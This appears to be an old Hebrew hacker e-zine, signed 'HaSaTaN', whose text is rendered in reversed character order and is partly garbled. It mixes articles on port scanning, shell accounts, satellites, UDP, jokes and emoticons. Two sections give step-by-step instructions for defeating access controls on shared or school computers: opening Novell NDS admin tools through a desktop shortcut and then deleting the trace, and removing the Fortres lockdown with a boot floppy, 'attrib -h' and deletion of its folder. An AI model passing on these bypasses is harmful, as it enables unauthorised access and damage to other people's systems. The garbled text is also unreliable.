דואמ הז תא ולגיש תויהל לוכי לבע (ןבומכ ןכוסמ רתוי היהי הז (שדח ןובשח ךימצעל רוציל וא
!רהמ
:שדחה ןובשחה תריצי וא םייונישה תא תושעל ךיא הנה
1 'ל שג . NDS :!בוקה תלעפה י$ע
nwadmn32.exe
2 ולגיש תויוש תושעל אלו ידמ רתוי לביהל אל רהזית קר (ךל אבש המ תושעל ישפוח שיגרת .
!ךתוא
C-O-O-L !!!
:םישרומ אל םיננוכל השיג תגשה
'ה (םימעפל admin תומוקמב תויהל הז תושע הצור התאש המ (םיננוכה לכל השיג ןתונ אל
איה וישכע העשהש ללגב תרגפמ הפשב וישכע בתוכ ינא( ךל רוסאש 12:34 (תופייעמ תמ ינאו
!הז תא #וקעל תושפב יד (לוכי התא ()וסחיתת לע זא
:ךכ תאז השע (ךלש ישארה ןנוכה תא אוצמל ךירצ התא ןושאר רבד זא
( תויורשפא !חלת (וישכע (תשרה לש םינוכהמ דחא לע תינמי הציחל !חלת (ילש בשחמל ךל
propertions םש תא הלעמל םש בותכ היהי )אמגודל קר( ונלש הרקמב (םש בותכ המ הארתו )
:ןנוכה gandalf :אבה רבדה התאו 2הלעפה2לחתה !חלנ (וישכע ()+םירכוז(
%%לאמשל ורשית%%
39.
// gandalf
:שלס הז ( םישלס 'ה יתש תועצמאב ןמוסמש תשר ןנוכל השיג שקבי אוה השעי בשחמהש המ
.) $/$
'ה םא admin ( הלעפה תדוקפ תא םסח םכלש ןברוחמה run :אבה רבדה תא ושע )
רבכעה לש ינמיש ןצחלה לע וצחילו םירוגס סואודניוו לש תונולחה לכשכ (הדובע'ןחלושל ועיגת
:ושיקה תבותכה תא שקבי אוהשכ (ךרד רוציק תריציב ורחיבו (הדובע'ןחלושה לע קר םוקמב
%%לאמשל ורשית%%
אוהש לכ רברס//
וצחלתו ENTER !םייסי אוהש דע םימעפ המכ
+הא בינגמ
:תוחיב תוארוה
:וצחילו ותוא ונמס (רוציקה !בוקב שומישה רחאל
shift + del
!רוזחמ לסל ותוא ריבעי אלו (תורישי תבוקה תא קחמי אוהש הז (השעי בשחמש המ
'הש םכל יאדכ אל תמאב admin תרשה לא הדובע ןחלושה לע ךרד רוציק שיש הארי םכלש
!ולש
:ךישמנ ואוב האלה
'ב תופצלו ןנוכה תא ליעפהל לכות התא (ךרד רוציקה לע תצחלש ירחא NDS !ולש
'ה admin 'ה תא םוסחל לוכי אל NDS 'ה םא םג (התאו admin רשפאש המ לכ םסח ךלש
'ב תופצל לכות ןיידע םלועב NDS לכות !ישומיש דואמ הז ןיידע לבא !רבד תונשל לכות אל לבא (
'ה לכ לש שמתשמה תומש תא תוארל group 'ה ללוכ admin .
HaSaTaN
Port scan
'ב תצק ונקסע םדוקה ןויליגבש רחאל Port Scanning אלש ידכ ידכ תושעל המ דמלנ םויה
)!!!( ךילע ושעי
Port Scanning .
ב םהש וא םיפרוצמ םדוקה ןוילגה לש םיצבקה( www.topcities.com/hackerim/herut.zip
!

39;
hd^?S
]U`C] %B
S?@T?U@T S?W^?S %G
S@_CRb ]\@WU %H
p`G?\ ]A Z@B %`
hG T?U@T %] host%ingore
ta?^@c %?
:המדקה ' א
Port Scanning תויעב שי םע קודבל הצורש תשר להנמ הז םא ןיב (הז תא םישוע םלוכ (
הז םא ןיבו (ולש תכרעמב Script Kid ןב 12 'ב םיחותפ םירופ שפחמש Server .והשלכ
םהש יל ורמא םה (עדימה תחבא םוחתב םיחמומ (עדימ תוכרעמ ילהנמ םא יתרבידשכ דימת
'ב ןמזו #סכ הרה םיעיקשמ Firewalls #א לבא (תושדח יכה החבאה תוכרעמבו םישדח יכה
'מ הנגה (יסיסב עמכה דעצה תא ושע םהש יתעמש אל םעפ Port Scanning !
לש אשונל רתי תונריע תניתנב Port Scanning ינפל (דואמ םדקומ תויעב הברה עונמל רשפא
'ב םיפותישה לכ םנשי רשאכ דחוימב !ידמ רחואמ רבכ הזש NetBIOS 'ה לכו Exploits לע
'ה Servers םינושה
Port Scanning detection !דימתמ הבושח
וליפא ICMP השועש רקאהל ןמיס תווהל לוכי )יהשלכ תשרמ וא( ךלש בשחמהמ חלשנש ןק
ךילע Port Scanning .
ינפמ הנגהל םיפי המכ ןתא ינא תאזה הבתכב Port Scanning רבסהו תונכות המכ ןכ םגו
ינפמ הנגה לש )תונורסחו תונורתי( םידדצה לכ לע ריבסא םג ינא (םתיא דובעל דציכ Port
Scanning .
:תוישומיש תונכות ' ב
( הנורחאה הפוקתבש ןייצל בושח םיליחתמ ונחנאש ינפל 2-3 'ה תונכות )םינש Port
Scanning יתלב ' ןכוסמ יכהו םיקזח (םיריהמ רתוי הברה םה וישכעו (המיהדמ הרוצב ומדתה
!םיארנ
'כ ינפל 3 'ב ושמתשה םישנאה בור םינש Port Scanner :םשב Strobe :י$ע בתכנ( 1ulian
Assange היה אוה ()
.)"ז קלחב אוצמל ןתינ ' וילא קניל( .ריהמ יכה אוה םויה םג םתסה ןמ (ריהמ יכהו ושפ יכה
'ב םישמתשמ םישנאה בור ' םויכ NMAP לש םסרופמה Inscure קר השוע אל אוהש ( Port
Scanning 'מ ןגמ םג אוה אלא ( Port Scanning אוהש הז (ולש םילודגה תונורתיה ןיבמ דחאו (
( הלעפהה תכרעמ תא ךל רמוא OS ךילע השועש הז( ינשה דצה לש ) Port Scanning הז תא ()
ךילע השעש הז ריאשהש $עבצאה תועיב$ב שומיש י$ע השוע אוה Port Scanning האוושהו
'ל DataBase (דימת עמכ ' ללכ ךרדב( המצע הנכותב אצמנש NMAP ולש תוכרעהב העו אל
.)ינשה דצה לש הלעפהה תכרעמ יבגל
!ךלש תשרה לע השוע התא המ תוארל לוכי םדא ןב לכ (הנכסמ הנכות םעש (הככ םכסנ .....זא
!היעב ךל שי זא אל םא +דחפמ
'ב רנאבה תא ריסהל תלעות רסח הזש ןבומכ Deamon יכ (הלעפהה תכרעמ גוס לע עיבצמש
ומכ תונכות NMAP 'וא Queso !הלעפהה תכרעמ גוס יוליגב ללכה ןמ תאצוי הדובע תושוע
םהב שמתשי והשימשכו (הז גוסמ תונכותל םיעדומ אל וליפא תותשרה'ילהנמ בור ( לזמה'עורל
!תושעל המ ועדי אל ושפ םה ' םדגנ
:תיקרפ העינמ ' ג
+םישוע המ זא ונ (םילאוש םכתוא עומשל לוכי רבכ ינא
$ עונמל ליבשב םירבד רפסמ רבכ יתיסינ (הככ זא Port Scanning ינימ לכ (ונלש תכרעמה לע $
קיורפה התייה (הליעי יכה הישה (תויש Abacus וניכה םהש (רתא הזיא לש קיורפ והז (
ענמתש הנכות Port Scanning .
!ךשמהב םהילע ריבסי ינאש תובינגמ תויצקנופ ינימ לכ הל שי ' הז קר אלו !תדבוע איהו
תרצוי איה (התוא תלעפהש עגרב Deamon ( שמושמ אל ךומנ רופב 3 הז אוהו ()אמגודל
'ה תא הלגמש Port Scanning !
33*
'מ םירופ םיקרוס םישנאה בורש ללגב 0 'ומכ והשמ דע 1050 :תא הסני רקאהה (
1 : failed
2 : failes
3 : DETECTED !
( $םידבוע$ש םירופ קיפסמ ול שי םג (ךכ 1,2 אוה (רדסב לכה רבכש בשוח אוהשכ ' הז ירחאו)
'ל עיגמ 3
!קפדנו
+דבוע הז ךיא ' ד
'ל הרושקש הנק הלב ןיבהל ךירצ (דבוע הז ךיא ןיבהל ליבשב TCP\IP :
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
1 חלשנ .''' "א בשחמ 1 . packet לש ךרעה ובו syn 'ל עבקנ 1 ךרעהו ack 'ל 0 .
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
2 ךרעהשכ קאפ חלוש )"א םע רשק רוציל הצור אוה םא( .''' "ב בשחמ 1 . syn 'ל עבקנ 1
1 ךרעהו ack 'ל 1 .
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
3 ינשל דחא םיחלוש ''''2 "א בשחמ 1 . Packets ( םיכרעה לכשכ syn,ack 'ל םיעבקנ ) 1 .
."ב בשחמ .'''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
תורבחתה יהוז TCP\IP .תירדנס
:םשב דואמ םירכומ םיכילתה תשולש TCP\IP three way handshake .
'ל סנכי אל ינא .דואמ ושפ רבסה והז squence numbers יתרבידשכ הז לע יתרבסה רבכ יכ
לע IP Spoof .
תוארלו והשלכ וה לע והשלכ רופ חותפל (לש ןורקיע ותוא לע םידבוע םירנאקס רופה בור
אוה םאה (רופה רפסמ :ןוגכ םיצוחנ םירפ רפסמ וילע תולגל ' ןיזאמ אוהשכ (ןיזאמ אוה םא
!המודכו חותפ
תעינמב דוסה Port Scanning ךל שיש הז תא איבחהל איה Deamon דחא לע ןקתומ
'ה תא ןיקתהל בושח םגו (םירופה Deamon ...חרוב אוהש ינפל עיגמ !רופהש םוקמב
'לש םיעדוי ונחנא םא Ftp שי Deamon רופ לע ןקתומ 21 !המש םישל אל עדינ (
םירתאמ !רבכו חורבל קיפסמ אל !רופה !תניוצמ )"ג קלחב( םדוקמ ונתנש אמגודה ' תאז תמועל
!דשוח אל והשכ ותוא
' ה ABACUS 'ב שומיש : host.ingore :
הנכותב ABACUS #יסוהל ונל תרשפאמש תניוצמ תורשפא ונל שי Hosts 'ו IP's המישרל
:תארקנש host.ingore לכו IP וא Host 'ה לע השעישכ ' המישרל סנכויש Local IP רופ
!ונממ םלעתת הנכותהו םולכ הרקי אל (גנינאקס
+בו הז המל
תא תנקתה התאו (תשר להנמ התא דיגנ ABACUS הצור התא םעפ ידמו (םיבשחמה לכ לע
ןילע השוע התא (םירופ וילע וחתפש םיצרופ םוש ןיאו (םיוסמ בשחמב ןיקת לכהש קודבל
לוכי אל התא !הא ' גנינאקס רופ ABACUS התא (הז ' השוע התאש המ זא !ךתוא םסוח
'ה תא הזה בשחמל #יסומו בשחמל שגינ Ip 'ל ךלש host.ingore !ולש
+אל (דמחנ
:םוכיס ' ו
!םכימצע לע רומשל םיצור םתא תמאב םע ' םוכיסל
:םכליבשב דחוימב הנהו (יתנייצש תונכותה תא ודירות
33+
:םיקניל
strobe
http://www.prosolve.com/download/strobe.zip
NMAP
http://www.tux.org/pub/security/nmap.zip )!םוחב !למומ(
ABACUS :
http://213.242.133.2/setup.exe
........והז
.......יתמייס
HaSaTaN
תיניול תרושקת
:הרצק המדקה
םירבדל קר אלא תיניוול תרושקת לש םירפה ירפל סנכיהל ךלוה אל ינאש ןיבהל םכילע
.םיבושחהו םייללכה
!אשונב תיללכ הנבהל ריצקת אלא םיניולל #יקמ ךירדמ וניא והז
םילגה לש תוריהמה תוכזב .םירצק םינורקלא םילג ידי לע תדבוע תינייוול תרושקת
ךות (רחא םוקמל םלועב דחא םוקממ תויורשקתה רוציל ןתינ םירצקה םינורקלאה 2 תוינש
!תילמרונ אל תוריהמב הז לכו !דבלב
לולסמב !ראה רודכ תא םיבבוס םינייולה .!ראה רודכ לכ תא #יקהל ידכ םינייול ינש םישורד
.ןמזה לכ ינורכניסואיג
339
רדתל התוא ריממ (!ראה רודכ לע הנחתמ םירצקה םינורקלאה םילגה תותוא תא לבקמ ןיוולה
.רחא ןיולל וא !ראה רודכ לע הנחתל וא האלה התוא ריבעמו רחא
( היהשה הנשי רבוע רדתהש םיכוראה םיקחרמה ללגב delay זא ןיוולהמ אצוי רדתהש ןמזה ןיב )
'ל היינשה תיפלאכ איה היהשהה .ולש דעיל עיגמ אוהש 110 .רמוליק
:םידיקפת יתש שי ןייולמ חלשנש ינורקלא לג לכל
1 ( רדתה תא קזחל . repeater ןיולל ינורקלא לג א$הודכ לע הנחתמ חלוש ינאו חיננ ' רמולכ ()
( ןיול הנחתל הז תא חלשיש הקירפאב ןיולל יסורה ןיולהמו (יסור dish האובבמיזב א$הודכ לע )
דבל עיגהל חילצי אל אוהש ללגב #רדתה תא קזחל אוה הקירפאל היסורמ חלשנש רדתה דיקפת
!האובבמיזב הנחתל יור ןיולמ
2 :רצק לגב רדת לש הליגרה הרמה ןבומכ וא .
.)הפיאל #רענא םשמו( ןייולל א$הודכמ עדימ .א
.)לארשי א$הודכ לע ןיול תנחתל יסור ןיולמ :אמגודל( א$הודכל ןייולהמ עדימ .ב
ארקנ( א$הודכל ןיולהמ םירצק םינורקלא םילג downlink םירצק םינורקלא םילגו )
ארקנ( ןיולל א$הודכמ uplink :לש םירדת חווב םיחלשנ ) 1.5-30 GHz םכריכזהל( 1 GHz -
:ל 1,000,000,00 HZ .)
!םיניוול לע ילש רצוקמה ריצקתה והז
!םתנהנש הווקמ
HaSaTaN
SHELL ACCOUNT )ללאש תונובשח(
המדקה :
המ םשל (ללאש לזאזעל הז המ תעדל םיצורש םישנא לש תושקב תואמ ירחא בתכנ הזה ךירדמה
.ל$נה ךירדמב ביחרנ הז לכ לע 7ללכב בו אוה המלו וב םישמתשמ ךיא (דעונ אוה
+ללאש ןובשח והמ
...ושפ נל תרזעב וילא םירבחתמ (&ונחנא5 חוקלהש (פירקס םצעב אוה ללאש ןובשח
קחורמה בשחמה לכ לע לוש התא םימעפלו...תקחורמ סקוניל,סקינוי תכרעמ םצעב אוה ללאש
סודניו ךל שי םא וליפא ךלש יתיבה בשחמה ךרד 98 ...רחא רבד לכ וא (
333
א"צ יתרש ןיקתהל (נרניאב שולגל רשפא ללאשה ךרד FTP םכל אבש רחא רבד לכו (
דע !ירהל םירשפאמ םיליגרה םיתרשה ללכ ךרדב לבא...שארל 3 .תינמז וב םיתרש
+דעונ אוה המ םשל
םישנאל רקיעב דעוימ אוה לבא (תוחפ תובושחו תובושח תורמ הברהל דעונ ללאשה ןובשח
ילב (םהל הנקמ סקונילהש םיתורישב שמתשהל םיצור תאז לכב םה לבא (סקוניל םהל ןיאש
.םכלש בשחמב ותוא ןיקתהל
םכל ןיא יכ תינדי תובתכנ וב תודוקפה לכ יכ' סקונילב ןויסינ תריבצ (דומילל שמשמ ללאשה דוע
'ה תכרעמ תא ריכזמ והשכיא אוהו (סודניוב ומכ יפארג ךסמ םוש ללאשב MS-DOS .
םכתוא ךבסל לוכיו יקוח אל שממ הזש תורמל...הצירפ ןבומכ אוה ללאשב ירקיע שומיש דוע
!!חוכ ברו ירשפא תאז לכב הז (ללאשה לעב לע תלפונ תוירחאה לכ יכ (לודגב
תוכרעמ לע לעופ אוה עצוממבשכ (דואמ ריהמ תרושקת ספ לע םילעופ ללאשה יתרש בור T3
ומכ םינקתהל עיגמ #או OC48 עיגמ רישכמה (הז המ עדוי אלש ימ תוושפ םילימבש'
!!הינשל ייב'הגי"ג שמחמ רתוי לש תוריהמל
תונקל הלוכי סקינוי תכרעמ קרש תוכיאב לכהו (םינווגמ םיתרש ןיקתהל םילוכי םתא ללאשב'
(םניח םינתינש םיללאשב (תאז תמועל .םידבוע םתא התיאש תוריהמה לע רבדנ אלשו...םכל
הברה םיספותש םיתרש וא םיא"צל םיוב !ירהל םכל תונתונ אלו תולבגומ דואמ תויורשפאה
דחפה ילב (ללאשב תוסנתהל םיילחמ תמאב םתא םאש ךכ (תורחא תולבגה הברה דועו ןורכיז
םלשל םכל היהי #ידע (סקוניל וניקתת םא בשחמה תא םכמצעל סורהל לש 8 דע 20 םירלוד
תכרעמב ומכ קוידב ירשפא רבד לכ עמכ וב תושעל םכל רשפאייש (םדקתמ ללאש ןובשחל
!הליגר סקינוי
ללאשב תויסיסב תודוקפ
שומישל תויסיסב תודוקפ המכ ןתינ (&רבדה ותוא5 סקוניל,סקינויב רבד םיעדוי אלש ולאל (בו
...םיריכמ םתאש ולאמ תונוש תודוקפה יכ..םכלש ללאשב
:הרעה
''''''
!בל תמושת הזל ושידקתש הככ (תונקל תולודג תויתוא ןיב לדבה שי סקינוי תוכרעמב
cd 'ה תכרעממ תרכומה הדוקפה התוא קוידב...םיצור םתאש היירפסל סנכיהל ' MS-DOS .
cat ןימ ' VIEWER .הייפצל םיבתוכ םתא ותוא !בוקה ןכות תא תוארל םכל ןתונש
wget .הדיל ובתכת ותוא קנילהמ !בוקה תא דירוהל הנכותל תרמואה הדוקפ '
lynx ןפדפד והז לבא (ולהבת לאש הככ (הקיפארג םוש ילב ןבומכ (תיתימא -הנכות- יהוז '
!תילאוסק הרוצב םירתא חתופ אוה יכ....םלועב רתויב ריהמה נרניאה
emacs תויורשפא הברה דועו (!תנכתל (סק יצבק ךורעל םכל תנתונש -הנכות- בוש '
!תורחא
gzip . גוסמ נרניאהמ םידירומ םתאש !ווכמ !בוק תחיתפל הדוקפ ' gz
tar 'ה םע דחייב ללכ ךרדב אבש !וויכ דוע והז ' GZIP . גוסמ םיצווכמ םיצבק חתופ אוהו tar
dir ...בשוח ינא רפל ךרוצ ןיא...ונלוכל תרכומ הדוקפ '
gcc 'ה תפשל רלייפמוקה ' C\C ...סקונילב עמכ וידעלב זוזל רשפא יאש ))
:תדוקפ תרזעב תושקובמה תונכות,תודוקפל הרזעה תא תוארל רשפאש (ןייצל בושח דוע
help ''
!תודוקפה ינש ןיב חוור םע
ושמתשה (סקונילה לועפתל רחא רבד לכ וא תודוקפה תא קמועל רתוי אורקל םיצור םתא םא
:תדוקפב
man
.דוע אורקל םיצור םתא וילעש רחא רבד לכ,הנכות,הדוקפה תא הדיילו
המכ םכל ןתינ (הנה זא (םיללאש גישהל רשפא הפיאמ תבותכ המכ םיצור חב םתא וישכע (בו
...תאז לכב לבא (ךכ'לכ םיצלמומ אלש םימניח םיללאש לש תבותכ
33:
nether.net ער אל שממ אוה אקווד '
freeshell.org
www.cyberarmy.com/lists לכב לבא (םיללאש לש תומישר םש שי ןיידע םא עדוי אל ינא'
!וסנת תאז
לש א"צה יתרש ךרד אוצמל רשפא םולשתב םיללאש EFNET, DALNET
< :םירדחב SHELLS, SHELL,BOUNCERS
!םיבו םיללאש תיינקל תומוקמ ןומה םכל םינתונש
:הנה זא (םכלש ללאשל רבחתהל ךיא םיעדוי אל תאז לכב םתא םא
telnet yourshellhere רופב ' 23
ינאש םיכירדמ תרדיסמ קלח אוה הז ךירדמ (םכלש עדייל תצק יתמרתש הווקמ (םעפהל והז זא
...םהמ םג ונהתש הווקמ...שדוחה ךלהמב איצוי
:םילאוש םלוכש (תוצופנ תולאש
:ארקמ
q .הלאש -
a .הבושת -
Q +ללאשה ןובשח והמ :
A :הז תא ארק (הרקמ לכב לבא הבתכמ םולכ תנבה אלש הארנכ הז תא לאוש התא םא :
'ב שמתשמ יאדוו התא windows םצעבש יפרג אל שממ קשממ אוה ךליבשב ללאשהש ךכ
'ה לש הלועפה תא השוע command.com 'ה( ( command.com לכ תא להנמש רבדה הז
'ב תודוקפה ms-dos םצעב הזש אלא () nix םג (רמולכ( % unix םגו linux השוע ללאשהש המ )
'ב תויהל וליאכ$ ךל ןתונ םצעב אוהש הז nix +תנבה (ךלש בשחמה ךרד לבא %
'הש רבד דוע nix וליפא וא ילבמסא( הנותחתה הפשל תודוקפה תא םגרתמ םדוק הז השוע %
זא קר (בשחמה לש הנותחתה הפשל תודוקפה תא םגרת אוהש רחאל קרו )תויראניב תורפש
םירפסמ ןוילימב ' יהשלכ הדוקפ בותכל ליחתהל ךממ ךסוחש רבד (תרשל הז תא ריבעמ אוה
לש 0010001010 "וכו
Q 'ה תא ךרצא ינאש המל (םדוקמ תינעש המ ךחוגמ שממ הז : shell תא יל שי םא )ללאש(
'ב תולועפ םתוא command.com הז המל רבסה( +ילש command.com אורקל ןתינ
)תמדוקה הבושתב
A תכרעמ ךותב םידקפתמ םהש וליאכ הזש םושמ ללאש תונובשח םיבהוא םישנא : nix %
'ב םג שמתשהל וצרי אל םישנאש המל (תונכתבו םיבשחמב םתוא םדקמש רבד (םהלשמ
nix 'ל רוביח םגו )הזל רוביח ןיידע לבא (נלה ךרד םנמא( % windows ++++
++םתנבה
Q םינתונ םהש ללגב ירמגל םיחירסמ םהש (ללאש תונובשח לש םיגוס שיש יל רמא ילש רבח :
+ןוכנ הז םאה +ךלש תודוקפו תולועפב בחרנ דואמ םוצמצ ךל
A וליאו (תשרב םניח םה םילבגומה םי"ללאשה ללכ ' ךרדב (ושפ ךכ לכ אל הז ךא (דואמ ןוכנ :
אוה ללאש ןובשח לש םומינימ כ$דב( היינק ירחא קר םינתינ םילבגומ אל םי"ללאשה 8$
ןיבל 20$ 'השכ 20$ 'המ הברהב בו 8$ תודוקפ ךממ םיללוש םה םילבגומה תונובשחב .)
גוסמ תודוקפ :םימדקתמל( תומיוסמ nslookup לבא .)נלה לש תודוקפו תונכות רפסמ דועו
!םיבו שממ הללאש תונובשח םנשי גאדת לא
33=
Q +םניח דחא גישהל לוכי ינאש ןוכנ תמאב הז זא :
A .)המצע הבתכב אורקל לכות הז תא גשהל דציכ( םוצמצ םע קר לוכי התא (ןכ :
Q +בו ןובשח אוה םא תעדל לוכי ינא ךיא (ללאש ןובשח יתגשה (יה :
A םירבדה תא ול שיש (בו ןובשח והז יליבשב ' לשמל (לאושש םדא ' ןבב יולת הז רבד :
:םיאבה
telnet )נל לע יתנכהש הבתכה תא וארקת הז המ םיעדוי אל םתא םא( נלב הכימת '
nslookup סוהה יבגל עדימ ךל ןתונ '
ftp 'ב הכימת ' ftp
finger םהלש ליימיאה תשקה ךרד םימיוסמ םישמתשמ לע היצמרופניא תלבק '
Traceroute ומכ רבד ותוא ' tracert הז המ םיעדוי אל םתא םא( בו רתוי הברה קר tracert
.)ינורקע שממ אל הז (הז תא ובזע זא
Dig גאדת לא לבא (הז תא ךל ונתי אל םיישפוחה םי"ללאשה בור (כ$דב '
Netstat 'ב ומכ קוידב ' windows
GCC ל רידא ריילפמוק ' c )אבה ןויליגב םירפ( רתויב ישומיש
Gzip לש קר (פיז ומכ ' nix %
Lynx 'ה ' broser רייס( windows !!! םלועב בו יכה )
וחקית לע חובש המ (יסחי לוכה ' וניבת יליבשב בו ןובשח אוה הז (םדוקמ יתרמאש ומכ
:םיאבה םירבדה תא אל ןיאש ללאש ןובשח

telnet
ftp
Gcc
HaSaTaN
ךתוא רצוע והשכ העונת רושל רמול יאדכש םיפשמה
.ילש הריבה תיחפ תא קיזחת םא קר הגיהנה ןוישר תא ךל תתל לוכי ינא
אוה ךלש חדקאה 9 םונגמה תא הארתש הכח +רמילימ 44 .ילש
לע תעסנ חב 160 !דובכה לכ .יתוא רוצעל ידכ ש$מק
33J
+ארוקש רושה הפיא +דבל התא
.רבוחמ וניא ילש ראדארה יאלגש יתעדי אל (רעצמ
.תורגבה תוניחב תא רובעל #ידעש יתלחה #וסב ךא (רוש תויהל יתיצר ינא םג
.רוש תויהל ידכ בו ינפוג רשוכב תויהל ךירצש יתבשח
חדקאה ילש שישחה תיקש תא םירהל יתפפוכתהשכ (בו +רזומ ךכ לכ יתעסנ המל לאוש התא
.תינוכמב הילש דבאל יל םרג הזו (זגה תשוודל םלבה תשווד ןיב עקתנו קיתרנהמ יל לפנ
!)%קחוצ%( ....חחח
HaSaTaN
םיליימס
:'( חמש/ךיחמ #וצרפ
7'( )הינוריא(חדבתמ #וצרפ
:') ללמוא/בוצע #וצרפ
:'/ קפס
:'2 עשורמ ךויח
:2(- ןקז
:'/ םפש
o :' םומה/קעוצ
:'< $רשג$ לעב שמתשמ/תומותח םייתפש
33N
j :' יחלב ןושל
8 :' אלמ הפב רבדמ
::'( לתלותמ רעיש
'( B שמש יפקשמ
:'( B שארה לע שמש יפקשמ
):') דואמ בוצע
X :' הלודג הבור הקישנ
:'& חור תרומ
D :4 שגרמ
r :' !וחב הנק ןושל
p :' !וחב הלודג ןושל
X :'( רפרפ תבינע םע ימשיר יליימס
-:'( סיקנפ / קור רמז
-:'( C חבמ #שא
Q :' ןשעמ
:'+ תרקמ ןשעמ
:/! רוסא ןושיעה
.:'1 )לבהא(רוב
O : דואמ םומה/חרוצ
;:'( )םילור הזל םיארוקש יל הארנ(רעיש ךופיב השא
:'( X ) ידוה/יברע
:'( q ךופה היחצמ עבוק
ן:'( c תעבגמ
S :' לבלובמ
3 :' קרוש
:'ז בשוח
'( o )...ךבוסמ והשמ תינויב םש הזיא הזל שי(ןיע דח
.:'. םעוז #וצרפ
I :' העבה רסח
c :' אקודמ #וצרפ
'( I ןשי #וצרפ
O-I קהפמ #וצרפ
:'(8 ריר ליזמ
:'% רמ/!ומח והשמ
:': היצומ
:'= לוקב חרוצ
:'& דפרע
:'5 שפית
I :'< (םפש 1 )
:'/ (םפש 2 )
:'!( (םפש 3 )
:'/( הפו םפש
9 :' םייתפש קקלמ
D :' קחוצ
e :' בזכואמ
v :' ןשקשק
'( 8 םייפקשמ ביכרמ
:-( םע #וצרפ 2 םיפא
:2( לודג #א םע #וצרפ
:4( רובש #א םע #וצרפ
:8( /%)......חחח(%/ #א חותינל קוקז #וצרפ
;'( /%!!!רררררררררררררידא %/ לזופ #וצרפ
33.
)'( תרופסתל קוקז
I ): /%)....ורמילק(%/ הציב שאר
'( 8 ( ןללוצ
%') /%)!!!ילכש רוגיפ(%/ ןיעב ול םיקיצמש תחא ןיע םע #וצרפ
:'( I %. /%)!!!עגרל עגרמ רדרדמ הז(%/ ימור לייח/סואלק הנס #וצרפ
)'):'( ערקהל יל םימרוג הלאה םירבדהו #ייע ינא!!!!רתוי לוכי אל רבכ ינא יד%/ רויפאה
)...םיפיעשכ(קוחצמ
':'( י רסימ
=:'( ןברו
&:'( ןמקוול ןיזאמ
'( O הלילצ תכיסמ
'< 8 תוומ
'< 8 2 תוומה ךאלמ
/):'( האפ
6):'( /%)!!+!+!+!+!+!+!+!+!+המ(%/ רעוס םויב האפ
/:'( עצמאב ליבש
%/ הפי יכה רבדה /%!!!!!!!
'"'(''= דרו
2:'2 ןש
8:'( O ךאלמ
HaSaTaN
ל הצירפ Fortres
+הרוק המ (הרבח ייה
רוזחל ולכותש ידכ( שפוחל דחוימ (םעפה זא ' םיבהוא םתאש םיכירדמה גו הז ' יתנבהש יפכ
:תארקנש תכרעמ !ורפל ךיא הריבסמש ' תאזה הבתכה תא יתאצוה )...לכה סורהלו 'ס$יבל
Fortres x.x .)תואסרגה לכ(
לוכיש המ (םיבשחמ םכלש ס$יבב שיש יאדוול בורק ' ינוע תנוכשב םירג אל םתא םא (הככ זא
!"וכו המרב םידבעמ (דואמ םיבו הלאה םיבשחמה כ$דבש (הז ' םכתוא עיתפהל
33;
' דובעלו רילוס קחשל הז םתיא תושעל םילוכי םתאש דיחיה רבדהש ' איה היעבה Word לכ (
+זובזב אל הז (הז ליבשב קר םיבשחמב ועיקשהש #סכה לכ לבזה
!אל
'ה אוהש )בשחמה אל (םדא'ןב תרשה( םכלש תרשה (הככ זא Sys-Admin ()תשרה להנמ(
:הנכותה תא ןיקתהו בשחמ לכ לע רבע ושפ Fortres ' יתרבסהש יפכ ' תאזה הנכותה (
...רילוסו םילילמת דבעמ קר (בשחמה לע )!( םולכ תושעל םכל תרשפאמ
++++םישוע המ
' בותכש המ תושעל הז ' תושעל ךירצש המ לכ (תאזה הנכותב החבא ירוח המכ הנה זא (בו
:דעצ רחא דעצ
קסיד ןיכתו (ךלש תיבל ךל .א Boot הז המ עדוי אל התא םא( Boot )הלודג הרצב התא
'ה םע קסידה תא איבת .ב Boot קר וילע היהיש (תויושמ יקנ היהי אוהש גואדל שי( ס$יבל
Boot .)
)...אד (וליאכ( םיבשחמ רדחל ךל .ג
קסידה תא סינכת .ד
בשחמה תא ליעפת .ה
'ה םא .ו Boot 'ה ךרד הז תא תושעל ךרצת ' אל םא ("ז" 'ל רובע ' יתמווא הלוע Bios שי(
יל
לע הבתכ Bios .)הז תא תושעל ךיא םש רופמ (תונויליגה דחאב
...)#יכ רתוי( #יכה עקה וישכע (יקוא .ז
בצמב וצחלת .ח Dos :
attrib -h %.%
)%לאמשל ורשית%(
'ה לש הייקיתה תא ושפח"ת . Fortres !התוא וקחמת ושפו
וקחשת נרניאב ושלגת (לכה וסרהת .י quick !םכל אבש המ
הנשמ אל( םכילצא דובעת איהש חוב אל ינא לבא (הלק רתוי איהש ןבומכ (האבה הישה
.)המל
:וצחלת רתא לש תבותכ !וחלל םוקמבו ()דובא הז זא (םכל ןיא םא( ררולפסקאל וסנכ (הככ זא
c ןנוכ תא ררולפסקאב םכל חתופ הז םא /: C !בו רבכ הז
.םיצבקה לכ תא גצה 22 הגוצת )תייסירכ( 22 הייקית תויורשפא 22 הגוצת :ל וכל
:תילגנאב וא view>folder options>view>Hidden files and folders>Show hidden files
and folders
:לש הייקיתל םג השיג םכל תויהל הרומא וישכע Fortres !
,% )!!!( תדבוע חובו החוב רתוי איה ($א$ היש ושמתשת דבוע אל הז םא םומיסקמ%,
HaSaTaN
U-D-P
:הבושתה הנה (םכלש ס$יבב תשרה תדבוע ךיא םכימצע תא םתלאש דימת

3:*
:ןכות
'ל רצק רבסהו המדקה .א UDP
( הליבחהשכ .ב Packet ...העיגמ )
'ה .ג IP 'הו UDP !חצנמ בולישכ
%הרעה%
$ בותכשכ IP :ל איה הנווכה $
'ה לוקוקורפ IP :ל אלו (
רפסמ IP .והשלכ
% %
%

UDP קפסמש רושיק רסחו ןמיהמ יתלב תוריש ותוא תא קפסמ IP דבלמ רבד #יסומ וניא אוה .
'ו (םירופה ירפסמ
checksum 'ה . checksum .ולפוי אל ונוש וא ותחשוה ןהינותנש תוליבחש חיבמ UDP אל
תרחובש היצקילפא (ןכל .תרושקתב תרחא היעב לכ לע וא (ודבא תוליבחש ךכ לע עידומ
'ב שמתשהל UDP (תרושקתה תונמיהמל המצעב גואדל הכירצ (הלש הרובעתה לוקוורפכ
.הכלהכ ולפוי (םינותנ ןדבוא וא םינותנ תוליפכ ומכ (תרושקתב תויעבש חיבהלו
%

